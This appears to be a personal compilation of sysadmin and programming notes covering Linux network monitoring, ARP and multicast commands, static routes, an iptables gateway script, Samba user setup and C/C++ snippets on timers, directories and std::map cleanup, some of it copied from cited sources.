Cheops - Network discovery, location, diagnosis and management. Cheops can identify all of the computers that are on your network, their IP addresses, their DNS names and the operating system they are running. Cheops can run a port scan on any system on your network. (Red Hat Powertools CD)

ntop - Shows network usage in a way similar to what top does for processes. Monitors how much data is being sent and received on your network. (Red Hat Powertools CD)


MRTG - Multi Router Traffic Grapher - Monitor network traffic load using SNMP and generate an HTML/GIF report. (See sample output)

dnsad - IP traffic capture. Export to Cisco NetFlow for network analysis reporting.
scotty - Obtain status and configuration information about your network. Supports SNMP, ICMP, DNS, HTTP, SUN RPC, NTP and UDP. (Red Hat Powertools CD)
Big Brother - Monitoring and service availability.
OpenNMS.org - Network management using SNMP. Also see Blast.com: OpenNMS
Nagios - host, service and network monitoring
Caldera guide - Network Monitoring Tools
Angel network monitor
Bing: Measure bandwidth between two systems - bandwidth ping

Using tcpdump to monitor the network:

[root@node prompt]# ifconfig eth0 promisc - Put the NIC into promiscuous mode to sniff traffic.
[root@node prompt]# tcpdump -n host not XXX.XXX.XXX.XXX | more - Sniff traffic but ignore the IP address of your own remote session.
[root@node prompt]# ifconfig eth0 -promisc - Pull the NIC out of promiscuous mode.

Network Intrusion and Hacker Detection Systems:
SNORT: Monitors the network, performing real-time traffic analysis and packet logging on IP networks for the detection of an attack or probe.

Linux Journal: Planning IDS for Your Enterprise - Nalneesh Gaur
Snort overview - Drew Beach
InterSect Alliance - Intrusion analysis. Identifies malicious or unauthorized access attempts.

ARP: Address Resolution Protocol
Ethernet hosts use the Address Resolution Protocol (ARP) to convert a 32-bit IP address into the 48-bit Ethernet MAC address used by network hardware. (See: RFC 826) ARP broadcasts are sent to all hosts on the subnet by the transmitting host. The broadcast is ignored by all except the intended receiver, which recognizes the IP address as its own. Computers on the subnet typically keep a cache of ARP responses. ARP broadcasts are passed on by hubs and switches but are blocked by routers. Reverse ARP (see: RFC 903) is a bootstrap protocol which allows a client to broadcast a request for a server to reply with the client's IP address.

arp (8) man page - manipulate the system ARP cache. Shows other systems on your network (including IP address conflicts):
arp -a - show the ARP table
arp -e - show the ARP table Linux style
arpwatch (8) man page - keep track of ethernet/IP address pairings
arpsnmp (8) man page - keep track of ethernet/IP address pairings. Reads information generated by snmpwalk.
arping (8) man page - send an ARP REQUEST to a neighbor host
Print an ARP reply (similar to arp -a): arping 192.168.10.99
List the ARP table: cat /proc/net/arp
ip (8) man page - show / manipulate routing, devices, policy routing and tunnels
View the ARP table: ip neighbor


ARP is something that simply works. No Linux system configuration is necessary. It's all part of the ethernet and IP protocol. The aforementioned information is just part of the Linux culture of full visibility into what is going on.

Configuring Linux For Network Multicast:
Regular network exchanges of data are peer-to-peer unicast transactions. An HTTP request to a web server (TCP/IP), email SMTP (TCP/IP), DNS (UDP), FTP (TCP/IP), etc. are all peer-to-peer unicast transactions. If one wants to transmit a video, audio or data stream to multiple nodes with one transmission stream, instead of multiple individual peer-to-peer connections (one for each node), one may use multicasting to reduce network load. Note that multicast and a network broadcast are different. Multicast messages are only "heard" by the nodes on the network that have "joined the multicast group", i.e. those that are interested in the information. The Linux kernel is fully Level-2 Multicast-Compliant: it meets all requirements to send, receive and act as a router for multicast datagrams. For a process to receive multicast datagrams it has to request that the kernel join the multicast group and bind the port receiving the datagrams. When a process is no longer interested in the multicast group, a request is made to the kernel to leave the group. It is the kernel/host which joins the multicast group, not the process. Kernel configuration requires "CONFIG_IP_MULTICAST=y". In order for the Linux kernel to support multicast routing, set the following in the kernel config:

CONFIG_IP_MULTICAST=y CONFIG_IP_ROUTER=y CONFIG_IP_MROUTE=y CONFIG_NET_IPIP=y

Note that on multihomed systems (more than one IP address/network card), only one device can be configured to handle multicast. Class D networks, with the range of IP addresses 224.0.0.0 to 239.255.255.255 (see Network Classes above), are reserved for multicast. Useful commands:

Command Description

cat /proc/net/igmp - List the multicast groups to which the host is subscribed, using the "Internet Group Management Protocol". (See /usr/src/linux/net/core/igmp.c)

cat /proc/net/dev_mcast - List multicast interfaces. (See /usr/src/linux/net/core/dev_mcast.c)

ping 224.0.0.1 All hosts configured for multicast will respond with their IP addresses

ping 224.0.0.2 All routers configured for multicast will respond

ping 224.0.0.3 All PIM routers configured for multicast will respond

ping 224.0.0.4 All DVMRP routers configured for multicast will respond

ping 224.0.0.5 All OSPF routers configured for multicast will respond

Multicast transmissions are achieved through proper routing, router configuration (if communicating through subnets) and programmatically with the use of the following "C" library function calls:

Function Call Description

setsockopt() Pass information to the Kernel.

getsockopt() Retrieve information broadcast using multicast.

For more on multicast programming see: Multicast Howto. The multicast application will specify the multicast loopback interface, TTL (network time to live), network interface and the multicast group to add or drop.

Add route to support multicast: route add 224.0.0.0 netmask 240.0.0.0 dev eth0


Living in a MS/Windows World:
In Nautilus, use the URL "smb:" to view MS/Windows servers.
LinNeighborhood: Linux workstation GUI tool.

Make your life simple and use the GUI/File Manager LinNeighborhood. It uses smbmount, samba and smbclient to give you access to MS/Windows servers and printers.

o LinNeighborhood Home Page o LinNeighborhood Screen Shot

See the YoLinux tutorial on integrating Linux into a Microsoft network.

Network Definitions:
IPv4: Most Internet servers and personal computers use Internet Protocol version 4 (IPv4). This uses 32 bits for a network address, written as the four octets of an IP address up to 255.255.255.255 - the representation of four 8-bit numbers, thus totaling 32 bits.

IPv6: Internet Protocol version 6 (IPv6) uses a 128 bit address and thus billions and billions of potential addresses. The protocol has also been upgraded to include new quality of service features and security. Currently Linux supports IPv6 but IPv4 is used when connecting your computer to the internet.

TCP/IP: (Transmission Control Protocol/Internet Protocol) uses a client - server model for communications. The protocol defines the data packets transmitted (packet header, data section), data integrity verification (error detection bytes), connection and acknowledgement protocol, and re-transmission.

TCP/IP time to live (TTL): This is a counting mechanism to determine how long a packet is valid before it reaches its destination. Each time a TCP/IP packet passes through a router it will decrement its TTL count. When the count reaches zero the packet is dropped by the router. This ensures that errant routing and looping aimless packets will not flood the network.

MAC Address: (media access control) is the network card address used for communication between other network devices on the subnet. This info is not routable. The ARP table maps TCP/IP address (global internet) to the local hardware on the local network. Use the command /sbin/ifconfig to view both the IP address and the MAC address. The MAC address uniquely identifies each node of a network and is used by the Ethernet protocol.

Full Duplex: Allows the simultaneous sending and receiving of packets. Most modern modems support full duplex.

Half Duplex: Allows the sending and receiving of packets in one direction at a time only.
OSI 7 Layer Model: The ISO (International Standards Organization) has defined the OSI (Open Systems Interconnection) model for current networking protocols.

OSI Layer / Description / Linux Networking Use
7 Application Layer. The top layer, for communications applications like email and the web. Linux use: telnet, web browser, sendmail
6 Presentation Layer. Syntax and format of data transfer. Linux use: SMTP, HTTP
5 Session Layer.
4 Transport Layer. Connection, acknowledgement and data packet transmission. Linux use: TCP, UDP
3 Network Layer. Linux use: IP, ARP
2 Data Link Layer. Error control, timing. Linux use: Ethernet
1 Physical Layer. Electrical characteristics of the signal and NIC. Linux use: Ethernet

Network Hub: Hardware to connect network devices together. The devices will all be on the same network and/or subnet. All network traffic is shared and can be sniffed by any other node connected to the same hub.

Network Switch: Like a hub but creates a private link between any two connected nodes when a network connection is established. This reduces the amount of network collisions and thus improves speed. Broadcast messages are still sent to all nodes.

Related Links:
Linux Network Management - Georgia Tech (Slovak mirror)
o Linux Network Commands
Cable modem HowTo - Vladimir Vuksan
Ethernet HowTo - Paul Gortmaker
YoLinux Tutorial: Setting up an internet gateway for home or office using iptables
Firewall HowTo - Mark Grennan
ipchains HowTo - Paul Russell
Networking Overview HowTo - Daniel Lopez Ridruejo
Networking Howto - Joshua Drake
NIS Howto - Thorsten Kukuk
NFS Howto - Nicolai Langfeldt
SNMP: Simple Network Management Protocol (uses ports 161, 162, 391, 1993)
o SNMP - Intro and tutorials
o Linux SNMP Network Management Tools
o SNMP FAQ
o net-snmp - tools and libraries
News/Usenet Group: comp.os.linux.networking - Deja
MARS-nwe - Netware emulator
Caldera: Netware for Linux - Includes full NDS
Linux 2.4 Advanced Routing HOWTO - iproute2, traffic shaping and a bit of netfilter
ATM:
o ATM on Linux
ISDN:
o ISDN4LINUX FAQ - Matthias Hessler
o ISDN4Linux Home Page
o ISDN Solutions for Linux
o Examples of ISDN for LINUX Installations
o Dan Kegel's ISDN Page
DSL:
o DSLreports.com: Reviews of DSL providers, bandwidth speed measurement, tools, info
PPP: Point-to-Point Protocol
o YoLinux Tutorial: Configuring PPP dial up connections to an ISP
o YoLinux Tutorial: Dialing Compuserve
o YoLinux Tutorial: Dialing AOL
o YoLinux Tutorial: Configuring PPP dial-in connections
PPTP: Point-to-Point Tunneling Protocol
o RFC 2637: Point-to-Point Tunneling Protocol (PPTP)
o PoPToP - PPTP server for Linux.


o PPTP-Linux Client - A PPTP Linux client that allows a linux system to connect to a PPTP server. Developed by C. S. Ananian.

o Counterpane Systems FAQ on Microsoft's PPTP Implementation - FAQ on the security flaws in Microsoft's PPTP Implementation.

DHCP: (Dynamic Host Configuration Protocol)
o YoLinux DHCP Tutorial - How to set up a DHCP server.
o ISC Dynamic Host Configuration Protocol - DHCP home page
Multicast:
o YoLinux Tutorial: Configuring Linux for multicast - this tutorial, in the section above
o Multicast over TCP/IP HOWTO
ISP's: (National/Global)
o TheList.com - Comprehensive list of ISP's
o Earthlink
o Concentric
o ATT Worldnet
NIS: (NFS infrastructure)
o NIS Startup Instructions
Ethernet cables:
o Making CAT 3, 5, 5E RJ45 Ethernet Cables
o Wiring and Installation
Gigabit Ethernet
VIX: Vienna Internet eXchange - European traffic exchange for ISP's
Test Internet Bandwidth:
o Test the speed of your connection by selecting this link - or this link (pick the tachometer icon)
o Bandwidth tests and large file transfers
o Bandwidth explained, and a list of bandwidth test sites
o System monitor gkrellm - monitors speed/bandwidth
Man Pages:
icmp - Linux IPv4 ICMP kernel module
ifport - select the transceiver type for a network interface
usernetctl - allow a user to manipulate a network interface if permitted
ripquery - query RIP (Routing Information Protocol) gateways
gated - gateway routing daemon

Renaming a network interface (Linux)

Suppose you want to rename eth1 to fddi0:
ifdown eth1
Edit the file /etc/modules.conf and change the alias for eth1, replacing it with fddi0.
Copy the file /etc/sysconfig/network-scripts/ifcfg-eth1 to /etc/sysconfig/network-scripts/ifcfg-fddi0.
Edit ifcfg-fddi0 and change DEVICE=eth1 to DEVICE=fddi0.
ifup fddi0


Configuring Static Routes (Linux)

From: http://www.centos.org/docs/5/html/5.1/Deployment_Guide/s1-networkscripts-static-routes.html

Routing will be configured on routing devices, therefore it should not be necessary to configure static routes on Red Hat Enterprise Linux servers or clients. However, if static routes are required they can be configured for each interface. This can be useful if you have multiple interfaces in different subnets. Use the route command to display the IP routing table.

Static route configuration is stored in a /etc/sysconfig/network-scripts/route-interface file. For example, static routes for the eth0 interface would be stored in the /etc/sysconfig/network-scripts/route-eth0 file. The route-interface file has two formats: IP command arguments and network/netmask directives.

IP Command Arguments Format

Define a default gateway on the first line. This is only required if the default gateway is not set via DHCP:

default X.X.X.X dev interface

X.X.X.X is the IP address of the default gateway. The interface is the interface that is connected to, or can reach, the default gateway.

Define a static route. Each line is parsed as an individual route:

X.X.X.X/X via X.X.X.X dev interface

X.X.X.X/X is the network number and netmask for the static route. X.X.X.X and interface are the IP address and interface for the default gateway respectively. The X.X.X.X address does not have to be the default gateway IP address. In most cases, X.X.X.X will be an IP address in a different subnet, and interface will be the interface that is connected to, or can reach, that subnet. Add as many static routes as required.

The following is a sample route-eth0 file using the IP command arguments format. The default gateway is 192.168.0.1, interface eth0. The two static routes are for the 10.10.10.0/24 and 172.16.1.0/24 networks:

default 192.168.0.1 dev eth0
10.10.10.0/24 via 192.168.0.1 dev eth0
172.16.1.0/24 via 192.168.0.1 dev eth0

Static routes should only be configured for other subnets. The above example is not necessary, since packets going to the 10.10.10.0/24 and 172.16.1.0/24 networks will use the default gateway anyway. Below is an example of setting static routes to a different subnet, on a machine in a 192.168.0.0/24 subnet. The example machine has an eth0 interface in the 192.168.0.0/24 subnet, and an eth1 interface (10.10.10.1) in the 10.10.10.0/24 subnet:

10.10.10.0/24 via 10.10.10.1 dev eth1

Duplicate Default Gateways

If the default gateway is already assigned by DHCP, the IP command arguments format can cause one of two errors during start-up, or when bringing up an interface from the down state using the ifup command: "RTNETLINK answers: File exists" or 'Error: either "to" is a duplicate, or "X.X.X.X" is a garbage.', where X.X.X.X is the gateway or a different IP address. These errors can also occur if you have another route to another network using the default gateway. Both of these errors are safe to ignore.

Network/Netmask Directives Format

You can also use the network/netmask directives format for route-interface files. The following is a template for the network/netmask format, with instructions following afterwards:

ADDRESS0=X.X.X.X
NETMASK0=X.X.X.X
GATEWAY0=X.X.X.X

ADDRESS0=X.X.X.X is the network number for the static route.
NETMASK0=X.X.X.X is the netmask for the network number defined with ADDRESS0.
GATEWAY0=X.X.X.X is the default gateway, or an IP address that can be used to reach ADDRESS0.

The following is a sample route-eth0 file using the network/netmask directives format. The default gateway is 192.168.0.1, interface eth0. The two static routes are for the 10.10.10.0/24 and 172.16.1.0/24 networks. However, as mentioned before, this example is not necessary as the 10.10.10.0/24 and 172.16.1.0/24 networks would use the default gateway anyway:

ADDRESS0=10.10.10.0
NETMASK0=255.255.255.0
GATEWAY0=192.168.0.1
ADDRESS1=172.16.1.0
NETMASK1=255.255.255.0
GATEWAY1=192.168.0.1

Subsequent static routes must be numbered sequentially, and must not skip any values. For example, ADDRESS0, ADDRESS1, ADDRESS2, and so on.

Below is an example of setting static routes to a different subnet, on a machine in the 192.168.0.0/24 subnet. The example machine has an eth0 interface in the 192.168.0.0/24 subnet, and an eth1 interface (10.10.10.1) in the 10.10.10.0/24 subnet:

ADDRESS0=10.10.10.0
NETMASK0=255.255.255.0
GATEWAY0=10.10.10.1

DHCP should assign these settings automatically, therefore it should not be necessary to configure static routes on Red Hat Enterprise Linux servers or clients.

Page 57: Appunti Informatica

Adding a Command Prompt entry to the Explorer context menu

1. In Explorer, open Tools, Folder Options.
2. Select the File Types tab.

3. For Windows XP: Go to NONE / Folder.

4. For Windows 2000: Press n to scroll to the N/A section.

5. For Windows NT/98/95: Press f to scroll to the Folders section.

6. Select the entry labeled Folder

7. For Windows 2000/XP: Press Advanced button.

8. For Windows NT/98/95: Press Edit button.

9. Select New

10. In the action block type "Command Prompt" without the quotes.

11. In the app block type "cmd.exe" without the quotes.

12. Save and exit Folder Options.

Now right click on Start, you should have a new drop down option. Open explorer and right click on a folder, select Command Prompt and a command window opens in that folder.

[Taken from http://www.petri.co.il/add_command_prompt_here_shortcut_to_windows_explorer.htm]

Removing debug information from a binary

The intention is that this option will be used in conjunction with --add-gnu-debuglink to create a two-part executable: a stripped binary, which occupies less space in RAM and in a distribution, and a debugging information file, which is only needed if debugging abilities are required. The suggested procedure to create these files is as follows:

1. Link the executable as normal. Assuming that it is called foo then...
2. Run objcopy --only-keep-debug foo foo.dbg to create a file containing the debugging info.
3. Run objcopy --strip-debug foo to create a stripped executable.
4. Run objcopy --add-gnu-debuglink=foo.dbg foo to add a link to the debugging info into the stripped executable.

Note - the choice of .dbg as an extension for the debug info file is arbitrary. Also, the --only-keep-debug step is optional. You could instead do this:

1. Link the executable as normal.
2. Copy foo to foo.full
3. Run strip --strip-debug foo
4. Run objcopy --add-gnu-debuglink=foo.full foo

i.e. the file pointed to by --add-gnu-debuglink can be the full executable. It does not have to be a file created by the --only-keep-debug switch.

[Taken from http://www.redhat.com/docs/manuals/enterprise/RHEL-4-Manual/gnu-binutils/strip.html]

My note:

Use strip -s foo to obtain foo without debug symbols.

Timers - microsecond resolution

The gettimeofday() function has a resolution of microseconds.

The functions gettimeofday and settimeofday can get and set the time as well as a timezone. The tv argument is a timeval struct, as specified in /usr/include/sys/time.h:
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* microseconds */
};

and gives the number of seconds and microseconds since the Epoch (see time(2)). The tz argument is a timezone:
struct timezone {
int tz_minuteswest; /* minutes W of Greenwich */
int tz_dsttime; /* type of dst correction */
};

The use of the timezone struct is obsolete; the tz_dsttime field has never been used under Linux - it has not been and will not be supported by libc or glibc. Each and every occurrence of this field in the kernel source (other than the declaration) is a bug. Thus, the following is purely of historic interest.

C++

#include <stdio.h>
#include <errno.h>
#include <sys/time.h>

int main(int argc, char *argv[])
{
    struct timeval time;
    struct timezone timez;
    int rc;

    rc = gettimeofday(&time, &timez);
    if (rc == 0) {
        printf("gettimeofday() successful.\n");
        printf("time = %ld.%06ld, minuteswest = %d, dsttime = %d\n",
               time.tv_sec, time.tv_usec,
               timez.tz_minuteswest, timez.tz_dsttime);
    } else {
        printf("gettimeofday() failed, errno = %d\n", errno);
        return -1;
    }
    return 0;
}

Benchmarking code

int main(int argc, char *argv[])
{
    struct timeval time, time1;
    struct timezone timez;

    gettimeofday(&time, &timez);
    /* <code to be timed> */
    gettimeofday(&time1, &timez);
    cout << "Total Time (usec): "
         << ((time1.tv_sec - time.tv_sec) * 1000000
             + time1.tv_usec - time.tv_usec)
         << endl;
    return 0;
}


Turning a Linux machine into a Gateway

The commands below, to be run as root, turn our Linux machine into a gateway. For this to work, iptables must be installed and working correctly.

There are three possibilities:

1. Run the commands one at a time.

2. Put them in a file that you run whenever needed.

3. Put them in a file that is executed at boot, for example rc.local in /etc.

Here is the example of a file gw.sh that you run when needed:

#!/bin/sh

# Enable forwarding support
/bin/echo "1" > /proc/sys/net/ipv4/ip_forward

# Load the kernel modules
/sbin/modprobe ip_tables
/sbin/modprobe ip_conntrack
/sbin/modprobe iptable_nat
/sbin/modprobe ipt_MASQUERADE

# Masquerade the packets
# [Replace 192.168.0.0 with the IP class you chose, with trailing zeros]
/usr/sbin/iptables -t nat -A POSTROUTING -d ! 192.168.0.0/24 -j MASQUERADE

# Enable IP forwarding only for my network
/usr/sbin/iptables -A FORWARD -s 192.168.0.0/24 -j ACCEPT
/usr/sbin/iptables -A FORWARD -d 192.168.0.0/24 -j ACCEPT
/usr/sbin/iptables -A FORWARD -j DROP

Warning! Before running this file or the commands it contains, you should bring up the ethX interface your network is attached to, using ifconfig or rc.conf.

Once the file is saved as gw.sh, open a terminal, change to the directory where you saved it, and type: chmod +x gw.sh

This makes the file executable; remember that you must be root when you run it. If you type the commands one at a time as root, or add them to a startup file (e.g. rc.local in /etc), leave out the line: #!/bin/sh

Now all that is left is to configure the other machines, assigning each one an IP address from the class you chose and giving them the gateway's IP.

Using Arch GNU/Linux machines as clients

Again as root, edit /etc/rc.conf (NETWORKING section), adding or modifying these lines:

gateway="default gw <ip_gateway>"
ROUTES=(gateway)

replacing <ip_gateway> with your gateway's IP address.

Using clients with other distributions installed

More generally, when dealing with other GNU/Linux machines, we can simply enter, as root, the following command:

route add default gw <ip_gateway>


so that the system uses our gateway. Remember that this setting will be lost on reboot: I therefore suggest putting it in a startup script (for example, /etc/rc.d/rc.local on Slackware). If you want to use the tools your distro provides for this purpose (such as /etc/rc.d/rc.inet1.conf on Slackware), refer to your distro's own documentation.

General notes

On our clients (whatever distro is installed) we will also have to configure DNS servers for proper name resolution. In /etc/resolv.conf we add these lines (these IPs are usable, but I suggest using the ones your ISP gave you):

nameserver 130.244.127.161
nameserver 212.216.112.222
nameserver 212.216.172.162

Once all this is done, every Linux machine on your network will be able to reach the Internet!

Shell script that does all of the above automatically:

You only need to edit EXTIF="eth0" and INTIF="fddi0" with the appropriate network interfaces.

[root@num_ds michele]# cat firewall.sh
#!/bin/sh
#
# rc.firewall-2.4
FWVER=0.62
#
# Initial SIMPLE IP Masquerade test for 2.4.x kernels using IPTABLES.
#
# Once masquerading has been tested, I recommend a much more complete
# ruleset than this basic one.
#

echo -e "\nLoading rc.firewall, version $FWVER...\n"

# Where does the IPTABLES program live?
#
IPTABLES=/sbin/iptables

# Settings for the EXTERNAL and INTERNAL interfaces of the network
#
# Every masqueraded network needs at least two interfaces:
# an internal one and an external one.
#
EXTIF="eth0"
INTIF="fddi0"
echo " External interface: $EXTIF"
echo " Internal interface: $INTIF"

#==========================================================================#
#== No need to edit below this line for the initial MASQ test ==#


echo -en " loading modules: "

# Verify that all modules have all their required dependencies
#
echo " - Verifying that all modules are ok"
/sbin/depmod -a

echo -en "ip_tables, "
/sbin/insmod ip_tables

echo -en "ip_conntrack, "
/sbin/insmod ip_conntrack

# Enable FTP connection tracking; prepend a '#' to disable it
echo -en "ip_conntrack_ftp, "
/sbin/insmod ip_conntrack_ftp

echo -en "iptable_nat, "
/sbin/insmod iptable_nat

# Enable FTP NAT by default; comment out with '#' to disable it
echo -en "ip_nat_ftp, "
/sbin/insmod ip_nat_ftp

# Other existing modules would go here

echo ". Done loading modules."

# Enable IP forwarding; Red Hat users could instead change the option
# in /etc/sysconfig/network from:
#
# FORWARD_IPV4=false
# to
# FORWARD_IPV4=true
#
echo " enabling forwarding.."
echo "1" > /proc/sys/net/ipv4/ip_forward

# Dynamic IP users: enable this option (1 by default)
echo " enabling DynamicAddr.."
echo "1" > /proc/sys/net/ipv4/ip_dynaddr

# Enable simple IP forwarding and Masquerading
#
# As already said, IP Masquerading is a form of SNAT.
#
# The following example refers to an internal LAN with class C
# addresses (192.168.0.x) and a subnet mask of 255.255.255.0 (i.e. /24).
# This example masquerades internal traffic out to the Internet and does
# not allow unsolicited traffic into the internal network.
#

# Clear the previous configuration
#
# If not specified, the defaults for INPUT and OUTPUT are ACCEPT.
# The default for FORWARD is DROP.
#
echo " clearing any existing rules and setting default policies.."
$IPTABLES -P INPUT ACCEPT


$IPTABLES -F INPUT
$IPTABLES -P OUTPUT ACCEPT
$IPTABLES -F OUTPUT
$IPTABLES -P FORWARD DROP
$IPTABLES -F FORWARD
$IPTABLES -t nat -F

echo " FWD: Allowing all OUT connections and only existing and related IN"
$IPTABLES -A FORWARD -i $EXTIF -o $INTIF -j ACCEPT
$IPTABLES -A FORWARD -i $INTIF -o $EXTIF -j ACCEPT
$IPTABLES -A FORWARD -j LOG

echo " Enabling NAT functionality on $EXTIF"
$IPTABLES -t nat -A POSTROUTING -o $EXTIF -j MASQUERADE
$IPTABLES -t nat -A POSTROUTING -o $INTIF -j MASQUERADE

echo -e "\nrc.firewall-2.4 v$FWVER done.\n"


Adding Users and Restarting Samba ( Linux )

At this stage, we are almost done. All that is left to do is add a user and restart Samba. In this example we are going to add the user john and assign him a Linux password and a Samba password, both of which will be jrambo. Open your terminal window and type in the following, entering jrambo as the password.

What this has done is create a Linux user named john with both the Linux and Samba passwords set to jrambo. These should be the same username and password that you log on to the Windows PC with. When you create a new Linux user, a home share is automatically created for that person; in this case it will be /home/john.

Now Samba has to be restarted so that all of the changes that we have made will take effect. Open a terminal window and type in the following.

Now, if you followed the instructions throughout this document, Samba should be set up for file sharing with Windows. If you log on to Windows with the username john and password jrambo, you should see the shares in your network neighborhood. And if you browse to the music share, you will find your mp3 files!


Manipulating Directories ( C-C++)

From : http://www.informit.com/guides

Last updated Jul 29, 2005.

Standard C++ doesn't have a library for manipulating directories. The closest thing you can get is Boost's filesystem library. However, most implementations nowadays support the quasi-standard <dirent.h> and <dir.h> libraries. These libraries, originally written in C, enable you to list the files in a directory, change the current directory, create a new directory and delete an existing directory.

Traversing a Directory

The <dirent.h> header declares functions for opening, reading, rewinding and closing a directory. To view the files in a directory, you have to open it first using the opendir() function:

DIR * opendir(const char * path);

opendir() returns a pointer to DIR. DIR is a data structure that represents a directory. A NULL return value indicates an error. path must be the name of an existing directory. To traverse a successfully opened directory, use readdir():

struct dirent * readdir(DIR * pdir);

pdir is the pointer obtained from a previous opendir() call. readdir() returns a pointer to a dirent structure whose data member, d_name, contains the name of the current file (the rest of dirent's members depend on the specific file system installed on your machine, so I won't discuss them here). Each successive call to readdir() advances to the next file in the directory. readdir() returns NULL either in the event of an error or once you have traversed all the files in the directory. To distinguish between these two conditions, check errno after every readdir() call. Since readdir() changes errno only if an error has occurred, you need to reset it explicitly before each readdir() call.

The rewinddir() function resets a directory stream to the first entry:

void rewinddir(DIR *pdir);

rewinddir() also ensures that the directory stream accurately reflects any changes to the directory (file deletion, renaming, etc.) since the last opendir() or rewinddir() call. Use closedir() to close the directory once you are done with it:

int closedir(DIR * pdir);

pdir is the pointer obtained from a previous opendir() call. The following C program lists the contents of the current working directory:

#include <errno.h>
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>

int main()
{
    DIR *pdir;
    struct dirent *pent;

    pdir = opendir(".");   /* "." refers to the current dir */
    if (!pdir) {
        printf("opendir() failure; terminating");
        exit(1);
    }
    errno = 0;
    while ((pent = readdir(pdir))) {
        printf("%s\n", pent->d_name);
    }
    if (errno) {
        printf("readdir() failure; terminating");
        exit(1);
    }
    closedir(pdir);
}

Create, Delete and Change a Directory

Other directory-related operations, such as creating, deleting, and changing a directory, are grouped in another quasi-standard library called <dir.h>. In POSIX systems, these functions are often declared in <unistd.h>. The mkdir() function creates a new directory:

int mkdir(const char * dirname, [mode_t perm]);

dirname contains the new directory's name. An invalid directory name causes mkdir() to fail. perm indicates the directory's permissions. This argument exists only in the POSIX version of this function. The function rmdir() deletes an existing directory:

int rmdir(const char * dirname);

rmdir() fails if the directory isn't empty. To remove a directory that contains files, you need to delete these files first and then call rmdir(). To obtain the full path name (including the drive) of the current working directory, call the getcwd() function:

char *getcwd(char *path, int num);

This function requires special attention. path is a char array of num characters. If the full pathname length (including the terminating '\0') is longer than num, the function call fails. If you don't know the pathname's length, pass NULL as the first argument. In this case, getcwd() uses malloc() to allocate a buffer large enough to store the current directory and returns its address to the caller. It's the caller's responsibility to release that buffer afterwards. chdir() changes the process's current working directory:

int chdir(const char * dirname);

If dirname isn't a valid path name, or if the process doesn't have the necessary permissions, chdir() fails.

Summary

The <dirent.h> and <dir.h> legacy libraries lend themselves easily to an object-oriented face-lift. For instance, the opendir() and closedir() pair of functions fits neatly into the well-known Resource Acquisition Is Initialization idiom. Similarly, instead of bare pointers, such as DIR* and dirent*, one could use iterators. An iterator-based interface would allow you to use ++ to advance to the next file, instead of calling readdir() repeatedly. More importantly, it would enable you to use STL algorithms to manipulate directories. Boost already offers a filesystem library designed according to these principles. Hopefully, it will be incorporated into standard C++ in the future. In the meantime, familiarity with these classic libraries is indispensable, especially if you're aiming at cross-platform solutions.


RPM Commands ( Linux )

With src.rpm packages you work like this:

source RPM (doing an 'rpm --rebuild rust-X.X-X.src.rpm' then installing the resulting rust-X.X.X-YYY.rpm).

rpmbuild --rebuild xxxx.src.rpm

List installed rpms:

rpm -qa | grep ......

List the files installed by an rpm:

rpm -ql <rpm>

Details and requirements of an installed rpm:

rpm -qi [--requires] <rpm>


STL Map iterators and deleting ( C++ )

I'm having issues with std::maps. I have a map with pointers to animations inside it, and when the program has finished, I would like it to delete them.

Q1. Does std::map.erase() properly delete pointers, or does it create memory leaks?

Q2. Without knowing whether erase() removes pointers properly or not, I have assumed that it doesn't, and have tried to loop through the map with an iterator, but am having problems. Here is my code:

// the main iterator, used for navigating through the map
std::map<std::string, Ani*>::iterator looper = aniPool.begin();
// a temporary iterator, used so that when I delete an element,
// the looping iterator does not lose its position
std::map<std::string, Ani*>::iterator elementToErase;
// loops through until none left
while (looper != aniPool.end()) {
    // sets the temporary iterator to the element to remove
    elementToErase = looper;
    // move the looping iterator
    looper++;
    // deletes the animation, using the temp iterator
    delete aniPool[elementToErase->first];
    // removes the deleted element
    aniPool.erase(elementToErase);
}

No, STL containers don't clean up memory, so it'll cause a leak.

Here is some tested code for deleting map elements; this will work for pretty much any container (all of the ones that I've tried, anyway):

#include <map>
#include <cstdlib>   // system()
#include <utility>   // std::make_pair

std::map<int, char*> Mappy;

int main()
{
    for (int Index = 0; Index < 10; ++Index)
        Mappy.insert(std::make_pair(Index, new char[10]));

    for (std::map<int, char*>::iterator MapItor = Mappy.begin();
         MapItor != Mappy.end(); ++MapItor)
    {
        char* Value = (*MapItor).second;
        delete[] Value;   // new[] must be matched by delete[]
    }

    system("pause");
    return 0;
}

. . . . . . . . .

By any chance, are you using the [] operator on the map after you've called Destroy()? The subscript operator will check whether an element exists, and if it doesn't, it will create one. For example:


#include <string>
#include <map>
#include <iostream>

int main()
{
    std::map<std::string, int> foo;

    foo["bar"] = 5;
    std::cout << foo["bar"] << std::endl;

    if (foo.empty())
        std::cout << "foo is empty 1" << std::endl;

    foo.clear();

    if (foo.empty())
        std::cout << "foo is empty 2" << std::endl;

    // using the [] operator will create an element "bar",
    // and foo will no longer be empty
    std::cout << foo["bar"] << std::endl;

    if (foo.empty())
        std::cout << "foo is empty 3" << std::endl;
}

Will output:

5
foo is empty 2
0


Managing Linux Modules ( Linux )

lsmod lists the loaded modules.

To insert a module: modprobe aic7xxx

To have the module available at system boot:

mkinitrd -f /boot/initrd-2.4.21-37.EL.img 2.4.21-37.EL


How to use your Tapedrive ( Linux )

( Taken from: http://nic.phys.ethz.ch/readme/80 )

Several of our Linux workstations are equipped with a tape drive. Tapes are normally used to exchange data; for backups, Netbackup is the preferred solution. See How to install Netbackup.

Devices
Samples with tar
Multiple files on the same tape
Backup across multiple tapes
Using cpio
Find the content of a tape

All tape drives are attached via a SCSI controller. To access a tape, choose the right device node:

/dev/st0  Linux 2.2 / D-PHYS1, first tape drive, rewinds when closed
/dev/nst0 Linux 2.2 / D-PHYS1, first tape drive, leaves tape in place when closed

Currently all machines equipped with a tape drive are running Linux 2.2. Come back to this tutorial after our upgrade of those workstations!

To save and restore data on tape, we use tar, mt and cpio. dump is not discussed here - it should not be used in Linux >= 2.4 against a mounted filesystem.

Now put a fresh cartridge of the right type in your tape drive and go through this tutorial:

check if the tape is online

me@host:~$ mt -f /dev/st0 status
drive type = Generic SCSI-2 tape
drive status = 318767104
sense key error = 0
residue count = 0
file number = 0
block number = 0
Tape block size 0 bytes. Density code 0x13 (DDS (61000 bpi)).
Soft error count since last status=0
General status bits on (45010000):
BOT WR_PROT ONLINE IM_REP_EN

A cartridge is inserted and ready to write. Because we used /dev/st0, the tape is now positioned at the beginning.

save the content of a directory

